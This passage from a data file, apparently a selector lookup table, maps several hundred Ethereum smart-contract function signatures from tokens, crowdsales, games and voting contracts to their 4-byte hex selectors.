"0xd15e9459", "allowTokenTransfer()": "0x71b5ee71", "BLOCKTIMEOUT()": "0xd4eb4540", "investorsBatchSize()": "0xe759dfb8", "teamProfitAddress()": "0xa89026a3", "allocated2Year()": "0x1a8932d9", "totalUserProfit()": "0xb69f5ada", "vaultOwner()": "0x1f52692b", "_saleState()": "0x9be5ad78", "reserveFundAddress()": "0x4b58d0bb", "thirdRoundPercent()": "0x44bec848", "getTotalLosses()": "0xe52c66c1", "observer()": "0xeb70e498", "limitDateCrowdWave2()": "0x888d5917", "backers()": "0x92dff48a", "lpBidVolume()": "0x208ebf16", "timelockController()": "0xf3388e75", "fuddToken()": "0x3dda7b1d", "transactionsCount()": "0xfd99a746", "DIVISOR()": "0x3410fe6e", "get_player_state()": "0x3c87b8ef", "hault()": "0x275103fd", "proxyVotingContract()": "0x2197021b", "saleGoal()": "0xc7c049fc", "DEFROST_MONTHLY_PERCENT()": "0x8e44e74e", "start_the_race()": "0xd47cc9d7", "tokenBurnAddress()": "0x3382ddab", "trusteeAddress()": "0x49c1d54d", "firstAllocation()": "0xc4f5cd82", "beta()": "0x9faa3c91", "last_balance()": "0x0727adb3", "cnt_per_Keos()": "0x25d30d8e", "AgencyLock1()": "0x887a8e33", "allow_contributions()": "0x03b918dc", "founderTokenUnlockPhase1()": "0xa5bebf48", "maxWiteList()": "0x67bb6d63", "bankAddress()": "0x7822ed49", "foundingTime()": "0x5d354b4d", "BRONZE_AMOUNT_XPER()": "0x8f38a896", "gameOpen()": "0x3cca779b", "ICO_PERIOD()": "0x1f218cf1", "totalAmountOfEarlyPurchasesWithoutBonus()": "0x957f371f", "autoPrice()": "0x7179ed22", "DURATION_PRESALE()": "0x301058c9", "poolCut()": "0x604d3943", "peer()": "0x11cda415", "unsoldAllocationDelay()": "0x1766f424", "getTokensForPresale()": "0x9eb44784", "CROWD_WEEK3_BONUS()": "0x9d1e641b", "artCopyright()": "0x6105b499", "pointer()": "0x2f5f3b3c", "revoked()": "0x63d256ce", "tokenSmartcontract()": "0x3f817449", "StatsTotal()": "0x629f4b3b", "bchRaised()": "0xf27402e9", "language()": "0xed9978c7", "expires()": "0xb1cb0db3", "icoPhase1End()": "0x04f182f4", "nextRoundCoolingTime()": "0xa986ef4a", "Batix()": "0xd42706bd", "EthMonoPoly(address)": "0x9d255663", "AporooToken(uint256,string,uint8,string)": "0x4ca6ba2f", "tokensForWei(uint256)": "0xeca058cc", "home(uint256)": "0x440a926a", "removeStorage(string)": "0x087da715", "getStorage(string)": "0x519e55da", "addStorage(string,address)": "0x263570c0", "upgradeContract(string,address)": "0x1271bd53", "register(string,address,bytes32)": "0xf34b95b3", "setNamehash(string,bytes32)": "0x7f5651d7", "getContractHash(string)": "0x0e219339", "setWhitelistedTransferer(address,bool)": "0x52fb0561", "totalTransferWhitelistMapping()": "0xe86d86ea", "removeBuyer(address)": "0x6f75b00c", "approvedBuyerForIndex(uint256)": "0xf69f8a5c", "approvedBuyer(address)": "0xc3437e06", "totalBuyersMapping()": "0xa4453a96", "setContributionMinimum(uint256)": "0xcb0b7b03", "customBuyerForIndex(uint256)": "0xb9447f7e", "customBuyerLimit(address)": "0x115f2be2", "totalCustomBuyersMapping()": "0xe01bc60b", "vestingBeneficiaryForIndex(uint256)": "0x4610a448", "vestingMappingSize()": "0x222101d1", "totalUnvestedAndUnreleasedTokens()": "0x8df388c1", "releaseVestedTokensForBeneficiary(address)": "0x99817b47", "releaseVestedTokens()": "0x54dd1da4", "revokeVesting(address)": "0x3b0da260", "foundationDeposit()": "0x9ae066b0", "foundationWithdraw(uint256)": "0xcedcd770", "setHaltPurchase(bool)": "0x6a420bbc", "grantTokens(address,uint256)": "0xc94e643c", "foundation()": "0x41fbb050", "circulationCap()": "0x56597e65", "cstBalanceLimit()": "0x820e79ed", "updateStorage(string,string)": "0x13bac8f2", "configure(bytes32,bytes32,uint256,uint256,uint256,address)": "0x5da01a5b", "upgradedFrom(address)": "0x66e3cb68", "upgradeTo(address,uint256)": "0xf6b2b334", "getStorageNameHash()": "0x98608111", "getLedgerNameHash()": "0x8f1d5f7e", "freezeToken(bool)": "0x771eee16", "totalFrozenAccountsMapping()": "0x2b28d2d0", "configureFromStorage()": "0x1a841b1b", "setIntValue(string,int256)": "0xabd6ff8e", "getIntValue(string)": "0x877c2184", "setBooleanValue(string,bool)": "0x3d8f89d7", "getBooleanValue(string)": "0x8de21650", "setBytesValue(string,bytes)": "0xbf3c1120", "getBytesValue(string)": "0x6e22d33e", "setAddressValue(string,address)": "0x413c6d13", "getAddressValue(string)": "0xfd255683", "setBytes32Value(string,bytes32)": "0x10278bc8", "getBytes32Value(string)": "0x7ec13996", "setUIntValue(string,uint256)": "0x03d75937", "getUIntValue(string)": "0x4f161245", "setBooleanMapValue(string,address,address,bool)": "0xaed214fb", "getBooleanMapCount(string)": "0xe89bc86b", "getBooleanMapValue(string,address,address)": "0x9793ebf4", "setLedgerValue(string,address,address,uint256)": "0xd658d3ed", "getLedgerCount(string)": "0x4f6acaa1", "getLedgerValue(string,address,address)": "0x34bdcd0a", "setMultiLedgerValue(string,address,address,uint256)": "0x1f69d230", "secondaryLedgerCount(string,address)": "0xa5403b3b", "primaryLedgerCount(string)": "0xe5dd05ab", "getMultiLedgerValue(string,address,address)": "0x088787a3", "makeAccountIterable(address)": "0x4537544c", "ledgerCount()": "0x9bb00ae3", "totalAdminsMapping()": "0x0489882e", "removeSuperAdmin(address)": "0x4902e4aa", "addSuperAdmin(address)": "0xb3292ff0", "totalSuperAdminsMapping()": "0xabf7b063", "setRewardsContractHash(address,bytes32)": "0x68907360", "getRewardsContractHash(address)": "0xba429f33", "getVestingRevokeDate(address,address)": "0x6335010d", "setVestingRevokeDate(address,address,uint256)": "0xf4586cba", "getVestingReleasedAmount(address,address)": "0x5cc95422", "setVestingReleasedAmount(address,address,uint256)": "0x7d53223a", "getVestingRevocable(address,address)": "0x7f01bb38", "getFullyVestedAmount(address,address)": "0x200fbcf0", "getVestingDuration(address,address)": "0xe4a9b286", "getVestingCliff(address,address)": "0xab22c561", "getVestingStart(address,address)": "0xec003704", "releaseVestedTokens(address,address)": "0x4698da9d", "setVestingSchedule(address,address,uint256,uint256,uint256,uint256,bool)": "0xc4b9223f", "getVestingSchedule(address,address)": "0xe16dd936", "canRevokeVesting(address,address)": "0x92a11827", "canGrantVestedTokens(address,address)": "0xe5a31c5d", "vestedAmount(address,address)": "0xaa77f26c", "vestedAvailableAmount(address,address)": "0xbca9adef", "releasableAmount(address,address)": "0x7243cfbb", "vestingBeneficiaryForIndex(address,uint256)": "0x52bafbfa", "vestingMappingSize(address)": "0x0b96406a", "setTotalUnvestedAndUnreleasedTokens(address,uint256)": "0xfead0097", "getTotalUnvestedAndUnreleasedTokens(address)": "0xeec5d076", "getApprovedBuyerMappingCount(address)": "0x576f7e31", "getApprovedBuyerForIndex(address,uint256)": "0xd97e38d6", "setApprovedBuyer(address,address,bool)": "0x6ace6dc8", "getApprovedBuyer(address,address)": "0x336077c3", "getCustomBuyerMappingCount(address)": "0x27132be6", "CryptoSagaArenaVer1(address,address,address,address,address,address,uint32,uint256,uint32,uint256,bool)": "0xf6105254", "setIsTurnDataSaved(bool)": "0x2b99f3e1", "setGoldReward(uint256)": "0x862eb9c0", "setExpReward(uint32)": "0x4a5e4fa8", "setCoolHero(uint32)": "0xfc36cc9d", "setLocationId(uint32)": "0xc4e6aaa6", "getPlayRecordNoTurnData(address,address)": "0xb99613cb", "getPlayRecord(address,address)": "0x8e1069f3", "popPlayer()": "0x914a5b24", "pushPlayer(address)": "0x8b55c1b3", "isPlayerInQueue(address)": "0x8d0e5136", "updateLeaderboard(address,address)": "0xe9b23b8b", "updateRecord(address,address,bool)": "0xb52db3b9", "CryptoSagaArenaRecord(address,uint32,uint8,uint8)": "0x5b5ecf19", "getRecentPlayersCount()": "0x27329380", "getRecentPlayers()": "0x88508a18", "getLeaderboardLength()": "0xab486607", "getLeaderboardPlayers()": "0x8e98c6b9", "getEloRating(address,address)": "0xede340ec", "getCorrectedTotalBPOfTokens(uint256[])": "0x2dc70b2a", "getCorrectedTotalBPOfAddress(address,address)": "0x5945793d", "getCorrectedStats(uint256)": "0x76390144", "CryptoSagaCorrectedHeroStats(address)": "0xa16e5326", "random(uint32,uint32)": "0xf378ff76", "withdrawDeposit(uint256)": "0x33289a46", "transferDeposit(uint256)": "0x2814da3c", "addDeposit(address,uint256)": "0x33026bb6", "addExp(uint256,uint32)": "0x1debbe2f", "deploy(uint256,uint32,uint256)": "0x284fb363", "mint(address,uint32)": "0xd35e29d7", "defineType(string,uint8,uint8,uint32,uint8,uint32,uint8,uint32[5],uint32[5],uint32[5])": "0xa412fcc7", "CryptoSagaHero(address)": "0xece66346", "setRequiredGoldIncreaseFactor(uint256)": "0xeceae9bf", "setRequiredExpIncreaseFactor(uint32)": "0x5c5df66a", "setGoldContract(address)": "0x33771860", "setHeroName(uint256,string)": "0x8276ccf2", "getTotalBPOfAddress(address,address)": "0x810164f7", "getTokenIdOfAddressAndIndex(address,address,uint256)": "0x380bbf78", "getGoldDepositOfAddress(address,address)": "0x618a1ec2", "getHeroRequiredExpForLevelUp(uint256)": "0x3230d486", "getHeroRequiredGoldForLevelUp(uint256)": "0xe8024468", "getHeroBP(uint256)": "0x8886ca33", "getHeroAvailableAt(uint256)": "0x26cbe6f5", "getHeroLocation(uint256)": "0x9cdd2e76", "getHeroLevel(uint256)": "0xcf654886", "getHeroName(uint256)": "0xac230e52", "getHeroClassId(uint256)": "0xd1f69902", "getHeroInfo(uint256)": "0x75e39f26", "getClassMintCount(uint32)": "0xe5522a5b", "getClassRank(uint32)": "0x1749bdf1", "getClassName(uint32)": "0x78744754", "getClassInfo(uint32)": "0x6ccd5cbe", "swapCardForReward(address,uint8)": "0xd6f327cc", "setCardContract(address)": "0xc030d8b8", "swap(uint256)": "0x94b918de", "mint(address,uint256,uint8)": "0x6112e8ac", "rankOf(uint256)": "0x82f68dc4", "setCryptoSagaCardSwapContract(address)": "0x5bd54fa3", "revokeAccessMint(address,address)": "0xeb0f46cc", "grantAccessMint(address,address)": "0x0d8b70bf", "revokeAccessDeploy(address,address)": "0x67c3e25e", "grantAccessDeploy(address,address)": "0x83a6ad6b", "revokeAccessDeposit(address,address)": "0xd886daa2", "grantAccessDeposit(address,address)": "0x5defe3d9", "_burn(uint256)": "0x9b1f9e74", "BTCEX()": "0x38953534", "removeToken(address,uint256)": "0x13baf1e6", "addToken(address,uint256)": "0xaf81c5b9", "clearApprovalAndTransfer(address,address,uint256)": "0xdc8b0203", "isApprovedFor(address,uint256)": "0x390ff134", "safeTransfer(address,uint256)": "0x423f6cef", "Economeme()": "0x49786571", "CreateIco(address,uint256)": "0x96879353", "eLYQD()": "0xc284ab55", "sendUnsoldTokensToTreasury(address)": "0x2e6d561b", "takeTokensBack()": "0x58c6f08b", "resumeCrowdsale()": "0xf6a60d89", "pauseCrowdsale()": "0xa8351c03", "setPriceRate(uint256)": "0x6786ed0e", "changeStartDate(uint256)": "0x00739f2a", "changeEndDate(uint256)": "0x45737b1e", "determineBonus(uint256)": "0x6d8d151b", "PVCCrowdsale(uint256,address,address)": "0xf48c2afa", "ISBCoin()": "0x802b45e2", "airdropToAddresses(address[],uint256)": "0x5a338506", "DPSToken(uint256,string,string)": "0x0bf6898e", "GuangPengChain()": "0x1c6a0cf8", "MWSToken()": "0x800ed545", "stopCrowdsale()": "0x507d5954", "openCrowdsale()": "0x28ef6f40", "ThankYouToken(uint256)": "0x71716992", "getNextBid()": "0x043da739", "approveExchange(address,address,uint256)": "0xe98dcba2", "transferEtherToSender(uint256)": "0x798ec637", "transferTokenToSender(address,uint256)": "0x13326f43", "quickConvert(address[],uint256,uint256)": "0xf0843ba9", "performSell(address[8],uint256[6],uint256,uint256,uint8,bytes32,bytes32)": "0x4981b3ca", "performBuy(address[8],uint256[6],uint256,uint256,uint8,bytes32,bytes32)": "0xbdd5be2f", "getAvailableAmount(address[8],uint256[6],uint256,uint8,bytes32,bytes32)": "0x4102bf5c", "MITCoin()": "0xc8b7c3ee", "findPossibleDelegatorsOfRaw(bytes32)": "0x64e48fde", "resolveRawDelegation(bytes32,uint256)": "0xdff3f83e", "resetAllDelegations(bytes32)": "0xb290b9ce", "createEthGlobalDelegation(address,address)": "0xc3a267b7", "createEthTknDelegation(address,address,address)": "0x01169399", "mkDelegation(bytes32,bytes32,uint256)": "0x58edbc84", "getSequenceNumber(uint256,address)": "0xcdd1b539", "getDb(uint256)": "0x77695d39", "setBallotOwner(uint256,address)": "0x07858f0e", "setDeprecated(uint256)": "0x086ac6d7", "setEndTime(uint256,uint64)": "0x97d5c6a1", "revealSeckey(uint256,bytes32)": "0x930d54b4", "getCreationTs(uint256)": "0x0050a315", "getSponsor(uint256,uint256)": "0x2f605106", "getSponsorsN(uint256)": "0x2985aacf", "getTotalSponsorship(uint256)": "0x605de51d", "getVote(uint256,uint256)": "0x49330cb8", "getDetails(uint256,address)": "0x9115abf4", "submitProxyVote(bytes32[5],bytes)": "0x579f20d8", "submitVote(uint256,bytes32,bytes)": "0x0425c357", "sponsor(uint256)": "0xb6cce5e2", "getNBallots()": "0x1b58c943", "getBBLibVersion()": "0xd7f42ee2", "getNamespace()": "0x27ac4b70", "fwdToResolver(bytes)": "0x3b7616ff", "fwdToENS(bytes)": "0xbeb9df86", "_setAddr(address)": "0xcd76635b", "SVDelegationV0101_1(address)": "0xb34f43c7", "_accountOkayChecks(bytes32,uint64)": "0xcefad386", "_addBallot(bytes32,uint256,uint256,bool)": "0xa99f0d9f", "_deployBallot(bytes32,bytes32,bytes32,uint256,bool,bool)": "0x94e93017", "doUpgrade(address)": "0x3f8416fb", "dDeployBallot(bytes32,bytes32,bytes32,uint256)": "0x39ade9aa", "dDeployCommunityBallot(bytes32,bytes32,bytes32,uint128)": "0xa942bf05", "dAddBallot(bytes32,uint256,uint256)": "0xe42a8bc9", "dDowngradeToBasic(bytes32)": "0x925d3ec8", "dUpgradeToPremium(bytes32)": "0xe9aeb932", "dOwnerErc20Claim(bytes32)": "0x95311142", "dInit(address,bool)": "0xebaf0e74", "getCommAuction()": "0xee880879", "getBBFarmID(bytes4)": "0xdd89daa5", "getBBFarm(uint8)": "0x1185a6b9", "getBackend()": "0x594eda64", "getPayments()": "0xd56bd142", "setABackend(bytes32,address)": "0xa5adb226", "_calcEditorKey(bytes)": "0x7298b261", "_commitBallot(bytes32,uint256,uint256,bool)": "0xa9225743", "_setDOwner(bytes32,address)": "0x2e404c0f", "_addDemoc(bytes32,address,address,bool)": "0x676e2eb1", "getDErc20OwnerClaimEnabled(bytes32)": "0x865cc6a3", "getDCommBallotsEnabled(bytes32)": "0x6627ace5", "getDCategory(bytes32,uint256)": "0x33b7d187", "getDCategoriesN(bytes32)": "0x054f268e", "getDCountedBasicBallotID(bytes32,uint256)": "0x62c0ffa8", "getDCountedBasicBallotsN(bytes32)": "0xf72f34db", "getDBallotID(bytes32,uint256)": "0xe23d0996", "getDBallotsN(bytes32)": "0x889b59d9", "getDEditorArbitraryData(bytes32,bytes)": "0x6f7b5a56", "getDArbitraryData(bytes32,bytes)": "0xfa3ed04d", "getDErc20(bytes32)": "0x565707a8", "getDInfo(bytes32)": "0xdb15b72d", "getDHash(bytes13)": "0x5d6c8e10", "isDEditor(bytes32,address)": "0xefbe584d", "getDOwner(bytes32)": "0x6670bdd8", "dAddBallot(bytes32,uint256,uint256,bool)": "0x960834f4", "dDisableErc20OwnerClaim(bytes32)": "0x71c7e923", "dSetCommunityBallotsEnabled(bytes32,bool)": "0x336481d4", "dDeprecateCategory(bytes32,uint256)": "0x06ed69b9", "dAddCategory(bytes32,bytes32,bool,uint256)": "0x34ec96bf", "dSetEditorArbitraryData(bytes32,bytes,bytes)": "0xa5c58944", "dSetArbitraryData(bytes32,bytes,bytes)": "0x93b557db", "setDErc20(bytes32,address)": "0xf5f5c622", "setDNoEditors(bytes32)": "0x4bb32e8c", "setDEditor(bytes32,address,bool)": "0xf7b822db", "setDOwnerFromClaim(bytes32,address)": "0xfb2e3240", "setDOwner(bytes32,address)": "0xe011171d", "dInit(address,address,bool)": "0xdab122de", "emergencySetDOwner(bytes32,address)": "0xe1fd3d4e", "dAdd(bytes32,address,bool)": "0x0fed240b", "getGErc20ToDemocs(address)": "0xca42afda", "getGDemoc(uint256)": "0x1a4fb653", "getGDemocsN()": "0xca1637f5", "checkFlags(uint16,uint16)": "0xb1e3301f", "qualifiesAsCommunityBallot(uint16)": "0x2025867b", "isTesting(uint16)": "0xf76a24e6", "isBinding(uint16)": "0xaea452ba", "isOfficial(uint16)": "0x81fb2585", "isEthWithEnc(uint16)": "0x19f8dee9", "isEthNoEnc(uint16)": "0xd826505d", "setPriceWei(uint256)": "0xc1e4dfda", "getBallotLogN(address)": "0xc98a79fb", "noteBallotDeployed(bytes32)": "0x0ba5890a", "getNextPrice(bytes32)": "0x0ee95ecf", "faucet()": "0xde5f72fd", "Erc20()": "0x0c9b5777", "submitVote(bytes32,bytes32)": "0x0d2ce376", "getTotalSponsorship()": "0xc8756f12", "getDetails(address)": "0x30289c61", "regNameWOwner(string,address,address)": "0xf78ed322", "regName(string,address)": "0x9e36fde7", "entityList(uint256)": "0x404cbffb", "myEntityCount()": "0x3ff69113", "MyMonsterCount(address)": "0x3e3deb8b", "deleteMyEntity(uint256)": "0x37dbbac4", "updateEntityNew(uint256,bool)": "0x25005498", "giveEntity(uint256,address)": "0x227c74a7", "fundsWallet()": "0x2194f3a2", "entityStructs(uint256)": "0x18d6676c", "createMyEntity(uint256,bytes32,bool,uint256,uint256)": "0x0c29e589", "MyMonsterIds(address,uint256)": "0x00360b66", "getGiftIdsByRecipient(address)": "0xdf816206", "nextGiftId()": "0xde5da0cf", "give(address,uint256,string,string)": "0xd0a2da8e", "recipientToGiftIds(address,uint256)": "0xc3b1d52b", "giftIdToGift(uint256)": "0xb4ab271c", "feesGathered()": "0x8fac3d3e", "fee(uint256)": "0x39b37ab0", "trainKitty(uint256)": "0xfa9789cf", "core()": "0xf2f4eb26", "kittyActions(uint256,uint256)": "0xecc310ae", "totalKitties()": "0xc0aace0b", "confirmKittyActions(uint256,uint256[8])": "0x8e07d7da", "addMoves(uint256,uint256[2])": "0x8c91bd3e", "changeVariables(uint256)": "0x8648f24c", "changeFees(uint256,uint256,uint256)": "0x7a319590", "specialGym()": "0x6db19eb8", "changeContracts(address,address,address,address,address)": "0x69557669", "learnFee()": "0x67716abc", "learnMove(uint256,uint256)": "0x66b10f70", "kittyData()": "0x65f520a7", "rerollFee()": "0x4754d136", "personalityTypes()": "0x35a49063", "reRollMove(uint256,uint256,uint256)": "0x168f788e", "cuddleData()": "0x0f5b807d", "trainFee()": "0x090e5465", "cityIndexToApproved(uint256)": "0xe561f28a", "createPromoCity(address,string,uint256)": "0x707d4349", "createContractCity(string)": "0x67141732", "cityIndexToOwner(uint256)": "0x21ac5aba", "getToken(uint256)": "0xe4b50cb8", "collectibleIndexToPrice(uint256)": "0xcfcd84a9", "collectibleIndexToOwner(uint256)": "0xc61b06ae", "getNextPrice(uint256,uint256)": "0x91508264", "collectibleIndexToApproved(uint256)": "0x60d1ce36", "unlockPriceChange()": "0x53acb23f", "buyToken(uint256)": "0x2d296bf1", "promoCreatedCount()": "0x05e45546", "challengeRewardsPercent()": "0xfe2450c1", "setRushTimeFloorCount(uint256)": "0xf2d93fb0", "masterRewardsPercent()": "0xefb95ced", "equipmentTrainingFeeMultiplier()": "0xed225a8a", "setChallengeScienceContract(address)": "0xe2c2d72c", "payments(address)": "0xe2982c21", "removeOwnership()": "0xd99bb9f7", "claimHero()": "0xc91b46c6", "getPlayerDetails(address)": "0xc8dd6ce7", "setPreparationPeriodTrainingFeeMultiplier(uint256)": "0xc5c9e3be", "dungeonPreparationTime()": "0xbe523c23", "setChallengeRewardsPercent(uint256)": "0xbb828f11", "trainingFeeMultiplier()": "0xb37dcce2", "rushTimeChallengeRewardsPercent()": "0xae7b1620", "train2(uint256,uint256)": "0xab702d48", "challengeFeeMultiplier()": "0xa9e899ef", "setTrainingScienceContract(address)": "0xa71168e3", "trainEquipment(uint256,uint256,uint256)": "0x97cdcbfd", "setChallengeFeeMultiplier(uint256)": "0x9406cf59", "transport(uint256)": "0x8d1c8048", "preparationPeriodTrainingFeeMultiplier()": "0x8ca84d40", "setMasterRewardsPercent(uint256)": "0x84120645", "challengeCooldownTime()": "0x806bd2b6", "train3(uint256,uint256)": "0x761bb70a", "getHeroDetails(uint256)": "0x730bdc96", "getDungeonFloorDetails(uint256)": "0x5ead330c", "setEquipmentTrainingFeeMultiplier(uint256)": "0x5a2f71d4", "setDungeonTokenContract(address)": "0x5661ba15", "playerToDungeonID(address)": "0x54bf3a73", "setHeroTokenContract(address)": "0x4b12416c", "transportationFeeMultiplier()": "0x496fbeb3", "setTransportationFeeMultiplier(uint256)": "0x463fbb76", "heroTokenContract()": "0x4272f2d5", "train1(uint256,uint256)": "0x3fc0234d", "setTrainingFeeMultiplier(uint256)": "0x36a60891", "setRushTimeChallengeRewardsPercent(uint256)": "0x368d6b25", "setDungeonPreparationTime(uint256)": "0x3350b915", "challenge(uint256,uint256)": "0x2e414890", "getDungeonDetails(uint256)": "0x1cfd11d5", "rushTimeFloorCount()": "0x111839d5", "dungeonTokenContract()": "0x0c17d023", "dungeonPlayerCount(uint256)": "0x030c3631", "setChallengeCooldownTime(uint256)": "0x024c764f", "totalPayments()": "0x005b4487", "locks(uint256)": "0xf4dadc61", "smallPrice()": "0xef8e8069", "maxBridgeHeight()": "0xe5033ee4", "calculateCost(uint256,uint256)": "0xce394696", "setSmallPrice(uint256)": "0xb1d27e3f", "mediumMod()": "0x93f8e9f7", "setWithdrawWallet(address)": "0x9373f432", "withdrawWallet()": "0x85d178f4", "maxBridgeWidth()": "0x7758bf86", "playerMakeBet(uint256,uint256,bytes32,uint8,bytes32,bytes32)": "0x77e13c10", "LuckyDice()": "0xc63f49ab", "mine(uint256)": "0x4d474898", "HashBux()": "0xa1e59471", "receiveApproval(address,uint256,bytes)": "0xa2d57853", "AtmanToken()": "0xec049219", "shutdown()": "0xfc0e74d1", "Dewcoin()": "0x51cfdd58", "GlobalBusinessSystem(uint256,uint256,uint256,uint256,address)": "0x3d089bf6", "GlobalBusinessSystemToken()": "0x17ac896c", "DollHair()": "0x8a3c36cb", "INTToken(uint256,string,uint8,string)": "0xb34f094f", "_isContract(address)": "0x7d48441f", "getContractDividends()": "0xa4c64d78", "ProofShrimpFarmer(address)": "0x6833716f", "AcceptsProof(address)": "0x56ac1efa", "Currency()": "0x6942eac7", "takeBounty()": "0x9712a764", "getICOBonus()": "0xc3cb4159", "getAmountBonus(uint256)": "0xc4ccf6ea", "manualTransferTokensTo(address,uint256,uint256,uint256)": "0xd1594403", "manualTransferTokensToWithBonus(address,uint256,uint256,uint256)": "0xcdb7699a", "isPreICO()": "0xb60f5b91", "manualTransferTokensToInternal(address,uint256,uint256,uint256)": "0xadd3bf39", "addCurrencyInternal(uint256)": "0x4b9cdbe7", "addCurrency(uint256)": "0xcbbcdf77", "manualTransfer(address,uint256)": "0x6857cb06", "DEVCoin(uint256,uint256)": "0x41e50814", "setTokenTransfer(bool)": "0x58dd6f23", "setAcceptPayment(bool)": "0xac5ec9ef", "computeReturnBonus(uint256)": "0xed5da4f9", "_transferBilrew(address,address,uint256)": "0x7b1e8871", "send_bounty_token(address,uint256)": "0x147d57b0", "unlockDevSupply()": "0x895c4c39", "KRWT()": "0xfbdb70fb", "SGCC()": "0x6ac98840", "BAFC()": "0xb0ff4210", "OracleBitfinex()": "0xf6a08ced", "OracleBase()": "0x4c95cb98", "updateRate()": "0xc7fee63e", "parseIntRound(string,uint256)": "0xfe192f1e", "oraclize_query(string,string,uint256,uint256)": "0x8b19a476", "oraclize_setNetworkAuto()": "0x5a5c8068", "buyWithReferral(uint128)": "0x50fb5a92", "getAllAgreements(uint256)": "0xa6c2f3b2", "getAgreementsCount()": "0x086fd46b", "_transfer(address,address)": "0x730f2a96", "transferAgreement(bytes32,address)": "0xdc2f56cf", "burnFrom(bytes32,uint256)": "0x0f1354f3", "issueTo(bytes32,uint256)": "0x0c3cebfa", "addAgreement(address,bytes32,uint32,uint32)": "0xbc7f58b1", "revokeMultiplePermissions(address,bytes32[])": "0x7ea46993", "revokePermission(address,bytes32)": "0x5fe07013", "grantMultiplePermissions(address,bytes32[])": "0x9ac3317b", "grantPermission(address,bytes32)": "0xf38a8262", "roundedDiv(uint256,uint256)": "0x51b644c0", "multiTransfer(address,address[],uint256)": "0x0aa20e73", "AUCoin()": "0x936e9904", "LDTCrowdsale()": "0xfe6214c4", "checkStatus()": "0x3b7104f2", "nextPeriod()": "0xec607f7d", "_updatePurchasingState(uint256)": "0xae319f60", "setOldE4(address,address)": "0xae4eba1f", "setOpGas(uint256,uint256,uint256)": "0x3cebb4d7", "blackHole()": "0x9e90f9aa", "calcCurPointsForAcct(address)": "0xdfec375e", "addAccount(address)": "0xe89b0e1e", "E4Lava()": "0xc02fd500", "optInFromClassic()": "0xff5639c4", "getAccountInfo(address)": "0x7b510fe8", "transferDividends(address)": "0xccf0768a", "checkDividends(address)": "0x22f16c8d", "GlobalTourToken()": "0x8d74fd52", "transferFromPrivileged(address,address,uint256)": "0x5d3171d9", "getPrivilegedBalance(address)": "0xab7e9dca", "transferPrivileged(address,uint256)": "0x1a017f3f", "mintingFinish()": "0x3ba8c9a7", "GGRocketToken(address,string,string,uint256,uint256)": "0xd1c85478", "getEOSKeyFor(address,address)": "0x09007804", "getMyEOSKey()": "0xae0996fc", "isClaimed(address,address)": "0xa4df0758", "claimEOSclassicFor(address)": "0xfa2f29b6", "claimEOSclassic()": "0x2d0ff779", "queryEOSCrowdsaleKey(address,address)": "0xc60b7784", "queryEOSTokenBalance(address,address)": "0xbc85c055", "returnGanaBeforeSale(address)": "0xf80f96f6", "burnAndReturnAfterEnded(address)": "0x4eb259aa", "transferToSafe()": "0x15d3e0a3", "afterStart()": "0x83e19248", "afterEnded()": "0x7d368f88", "buyGana(address)": "0x075deb95", "GanaPublicSale(address,address,address)": "0x3298e6c8", "unregisterAddresses(address[])": "0x0136356d", "unregisterAddress(address)": "0x00f7c5be", "registerAddresses(address[])": "0x846153b5", "registerAddress(address)": "0xa8a54008", "claimTokens(address,uint256)": "0xfe417fa5", "GANA()": "0x5b154394", "saleTransfer(address,uint256)": "0xa51a8682", "unsetManager(address)": "0x29b0de1e", "getCCH_edit_12()": "0x9de91ccd", "setCCH_edit_12(string)": "0xad483188", "getCCH_edit_11()": "0x718f81c2", "setCCH_edit_11(string)": "0x60de94d0", "getCCH_edit_10()": "0xb54beedc", "setCCH_edit_10(string)": "0x74b58ae7", "getCCH_edit_9()": "0xed9c6d53", "setCCH_edit_9(string)": "0x27731e77", "getCCH_edit_8()": "0xc7f24b11", "setCCH_edit_8(string)": "0x6a1bf209", "getCCH_edit_7()": "0x5925cfe3", "setCCH_edit_7(string)": "0x1fd7f431", "getCCH_edit_6()": "0x40c2dc4a", "setCCH_edit_6(string)": "0x1c9f289d", "getCCH_edit_5()": "0x97a7293d", "setCCH_edit_5(string)": "0x409ed1db", "getCCH_edit_4()": "0xcb9b3a3c", "setCCH_edit_4(string)": "0x00601801", "getCCH_edit_3()": "0x18f76a2c", "setCCH_edit_3(string)": "0xa62784e2", "getCCH_edit_2()": "0xd5d5913c", "setCCH_edit_2(string)": "0x6fde90bc", "getCCH_edit_1()": "0x396724c3", "setCCH_edit_1(string)": "0x5944b7d9", "CCH_EDIT_2()": "0xad8d36cb", "MNPYToken()": "0x315b86da", "recovery()": "0xddceafa9", "reward_total()": "0xaa93038b", "getCoinIndex(bytes32,address)": "0x7274f35b", "stringToUintNormalize(string)": "0x85ba0052", "forceVoidRace()": "0xb8444c13", "claim_reward()": "0x055ee253", "calculateReward(address)": "0xd82e3962", "setupRace(uint256,uint256)": "0xaff6b3e8", "placeBet(bytes32)": "0x042b5fed", "Betting()": "0xfde07212", "depositHouseTakeout()": "0x3270f753", "remoteBettingClose()": "0xb6fe87fb", "getModerator()": "0x48adfbdb", "extract(address)": "0xc7a5d285", "unrestrict()": "0xad57a2df", "restrict()": "0x9649d98b", "reassignModerator(address)": "0x3b06903e", "Moderated()": "0x8055f9d7", "rewardMathGeniuses(uint256,uint256)": "0xe5f952d7", "getAllCardAddressesPriceOfOwner(address)": "0x6402aca9", "getAllCardAddressesCountOfOwner(address)": "0x6fe83236", "getAllCardAddressesOfOwner(address)": "0x1579e5c5", "getAllOwnersClaimPriceOfCard(address)": "0x9fb876c0", "getAllOwnersOfCard(address)": "0x51b41b62", "getAllCardsClaimContender()": "0xcbc85c97", "getAllCardsLowestPrice()": "0x145af145", "getAllCardsForClaim()": "0x15e3d37d", "getAllCardsClaimed()": "0x9b9958af", "getAllCardsDefence()": "0x8d98f4e3", "getAllCardsAttack()": "0x46fae630", "getAllCardsModifierSecondaryVal()": "0xa45b1795", "getAllCardsModifierPrimaryVal()": "0x81751312", "getAllCardsModifier()": "0x562bfb9f", "getAllCardsType()": "0x0d290220", "getAllCardsAddress()": "0xd7cbbb73", "getTotalUniqueCards()": "0x3f181ef2", "getCardIndexOfOwner(address,address)": "0x7663f171", "getOwnerOfCardsCheapestWager(address,address)": "0x9af3b527", "getCheapestCardWager(address)": "0x25f5ec45", "getCard(address)": "0xceafb18d", "calculateAdjustedFiguresForBattle(address[3],address[3])": "0xdad0128d", "transferCard(address,address,address)": "0xdfbcb8d9", "updateCardStatistics(address)": "0x74ab3e4b", "generateCardsFromClaimForOpponent(address,address)": "0x78c3e7a4", "ownerCanClaimCard(address,address,address[3],uint256)": "0xd8085f78", 